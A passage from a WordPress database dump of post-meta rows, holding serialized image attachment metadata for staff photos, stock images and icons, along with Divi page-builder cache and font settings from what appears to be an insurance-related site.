;a:5:{s:4:\"file\";s:16:\"Seth-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29797;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:16:\"Seth-480x455.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28919;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"78\";s:8:\"quantity\";d:88;s:4:\"webp\";i:0;}}'),(698,218,'_wp_attached_file','2023/03/Matthew-Sutton.jpg'),(699,218,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:610;s:6:\"height\";i:578;s:4:\"file\";s:26:\"2023/03/Matthew-Sutton.jpg\";s:8:\"filesize\";i:131569;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"Matthew-Sutton-300x284.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21009;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"Matthew-Sutton-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15230;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:26:\"Matthew-Sutton-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22042;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:26:\"Matthew-Sutton-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23473;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:26:\"Matthew-Sutton-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30377;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:26:\"Matthew-Sutton-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32908;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:26:\"Matthew-Sutton-480x455.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32640;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"80\";s:8:\"quantity\";d:88;s:4:\"webp\";i:0;}}'),(700,219,'_wp_attached_file','2023/03/Andres-Cano.jpg'),(701,219,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:610;s:6:\"height\";i:578;s:4:\"file\";s:23:\"2023/03/Andres-Cano.jpg\";s:8:\"filesize\";i:109513;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Andres-Cano-300x284.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19486;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Andres-Cano-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14870;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:23:\"Andres-Cano-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20002;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:23:\"Andres-Cano-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20816;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:23:\"Andres-Cano-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25153;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:23:\"Andres-Cano-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27166;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:23:\"Andres-Cano-480x455.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:455;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26694;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"78\";s:8:\"quantity\";d:88;s:4:\"webp\";i:0;}}'),(3179,819,'_et_dynamic_cached_attributes','a:0:{}'),(3180,819,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(3181,819,'_et_builder_module_features_cache','a:2:{i:0;s:108:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"tb\":{\"528\":\"2023-04-10 13:15:21\",\"523\":\"2023-04-08 21:29:25\"},\"wpe\":[]}\";i:1;a:20:{s:46:\"et_pb_section_32a8701e7e646d30f5be44fd1d6edd9d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_c3a1c68d2adfcb81a9fe911b91eb1bb1\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_c3c3262b1d77b10d3324caf58042baf2\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_menu_3956b2fa036f918b04bf26e28a131ba0\";a:9:{s:4:\"glde\";a:4:{s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_9fd123983dc2341e5ef65cd3b6a5c4d5\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_ec098db2d8feb35222698225e8e7837e\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_d23edf8adb8f56683ff129699a3c214c\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_code_ded3d54e9d9d9cf73bd4f2bac263e78b\";a:4:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_172db018d4013a78711547224058b6c2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_31fed4101e23ca62587312176ae0485e\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_752d704473cb7649afba5776e481f4d6\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:50:\"dsm_typing_effect_f83fbae2b90aa9ca67e8f7cdaad5f02e\";a:8:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_1c9d155ec9a950d8f0cf7d9fe5cf84e2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_9f6c6d70948c656773a17b5acb09701d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_dc94591ca1f11490920cfd7ce8dba4f5\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_77d127db2576298639a5583910366fe3\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_871c12bedc48851ed22de1edc6b0a8be\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9740826f7ba656f5ce332a179206bb40\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_0c6c5085bab557fb2d753c3737ff57a8\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9b58c67d7966a2e09473c3a3f2480328\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(704,221,'_wp_attached_file','2023/03/AdobeStock_132618162-scaled.jpeg'),(705,221,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:40:\"2023/03/AdobeStock_132618162-scaled.jpeg\";s:8:\"filesize\";i:1391515;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26499;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"AdobeStock_132618162-1024x683.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216656;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17856;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-768x512.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119871;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"AdobeStock_132618162-1536x1024.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:500005;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:35:\"AdobeStock_132618162-2048x1365.jpeg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:899927;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-400x250.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36726;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:34:\"AdobeStock_132618162-1080x675.jpeg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:228000;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-400x284.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40244;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-510x382.jpeg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63376;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:34:\"AdobeStock_132618162-1080x720.jpeg\";s:5:\"width\";i:1080;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:240439;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-400x516.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70367;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:35:\"AdobeStock_132618162-2880x1800.jpeg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1657325;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:34:\"AdobeStock_132618162-1280x854.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:854;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:342737;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-980x653.jpeg\";s:5:\"width\";i:980;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198274;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:33:\"AdobeStock_132618162-480x320.jpeg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50215;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"Song_about_summer - stock.adobe.\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:41:\"are you covered, travel insurance concept\";s:17:\"created_timestamp\";s:10:\"1478989973\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:41:\"are you covered, travel insurance concept\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:44:{i:0;s:7:\"outdoor\";i:1;s:3:\"you\";i:2;s:6:\"secure\";i:3;s:7:\"medical\";i:4;s:6:\"travel\";i:5;s:4:\"loss\";i:6;s:6:\"policy\";i:7;s:5:\"risky\";i:8;s:6:\"insure\";i:9;s:7:\"concept\";i:10;s:4:\"life\";i:11;s:4:\"sand\";i:12;s:4:\"safe\";i:13;s:8:\"accident\";i:14;s:9:\"insurance\";i:15;s:3:\"ask\";i:16;s:7:\"covered\";i:17;s:8:\"security\";i:18;s:4:\"wave\";i:19;s:4:\"risk\";i:20;s:10:\"protection\";i:21;s:7:\"written\";i:22;s:5:\"beach\";i:23;s:7:\"protect\";i:24;s:9:\"assurance\";i:25;s:4:\"care\";i:26;s:4:\"case\";i:27;s:6:\"safety\";i:28;s:9:\"emergency\";i:29;s:4:\"text\";i:30;s:10:\"assessment\";i:31;s:3:\"sea\";i:32;s:5:\"drawn\";i:33;s:6:\"danger\";i:34;s:5:\"water\";i:35;s:6:\"health\";i:36;s:10:\"conceptual\";i:37;s:7:\"message\";i:38;s:8:\"question\";i:39;s:11:\"handwritten\";i:40;s:5:\"sport\";i:41;s:5:\"ocean\";i:42;s:15:\"are you covered\";i:43;s:10:\"healthcare\";}}s:14:\"original_image\";s:25:\"AdobeStock_132618162.jpeg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"70\";s:8:\"quantity\";d:41;s:4:\"webp\";i:0;}}'),(1827,474,'_wp_attached_file','2023/03/Thought-Bubbles.png'),(1828,474,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:5000;s:6:\"height\";i:5000;s:4:\"file\";s:27:\"2023/03/Thought-Bubbles.png\";s:8:\"filesize\";i:239567;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12139;}s:5:\"large\";a:5:{s:4:\"file\";s:29:\"Thought-Bubbles-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46735;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5799;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34148;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:29:\"Thought-Bubbles-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:73192;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:29:\"Thought-Bubbles-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:100401;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12979;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:28:\"Thought-Bubbles-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38735;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13799;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18488;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:29:\"Thought-Bubbles-1080x1080.png\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49610;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18046;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:29:\"Thought-Bubbles-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110206;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:29:\"Thought-Bubbles-1280x1280.png\";s:5:\"width\";i:1280;s:6:\"height\";i:1280;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59968;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-980x980.png\";s:5:\"width\";i:980;s:6:\"height\";i:980;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44203;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:27:\"Thought-Bubbles-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20107;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"20\";s:8:\"quantity\";d:88;s:4:\"webp\";i:0;}}'),(1829,475,'_wp_attached_file','2023/03/Umbrella-Roll-in-Icon.png'),(1830,475,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:5000;s:6:\"height\";i:5000;s:4:\"file\";s:33:\"2023/03/Umbrella-Roll-in-Icon.png\";s:8:\"filesize\";i:347168;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9185;}s:5:\"large\";a:5:{s:4:\"file\";s:35:\"Umbrella-Roll-in-Icon-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:54763;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6797;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40119;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"Umbrella-Roll-in-Icon-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:92090;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:35:\"Umbrella-Roll-in-Icon-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128645;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12908;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:34:\"Umbrella-Roll-in-Icon-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40483;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14877;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20777;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:35:\"Umbrella-Roll-in-Icon-1080x1080.png\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:60755;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12616;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:35:\"Umbrella-Roll-in-Icon-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:129635;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:35:\"Umbrella-Roll-in-Icon-1280x1280.png\";s:5:\"width\";i:1280;s:6:\"height\";i:1280;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:73990;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-980x980.png\";s:5:\"width\";i:980;s:6:\"height\";i:980;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51430;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:33:\"Umbrella-Roll-in-Icon-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23531;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"26\";s:8:\"quantity\";d:82;s:4:\"webp\";i:0;}}'),(708,223,'_wp_attached_file','2023/03/AdobeStock_373681300-scaled.jpeg'),(709,223,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:1702;s:4:\"file\";s:40:\"2023/03/AdobeStock_373681300-scaled.jpeg\";s:8:\"filesize\";i:552713;s:5:\"sizes\";a:16:{s:6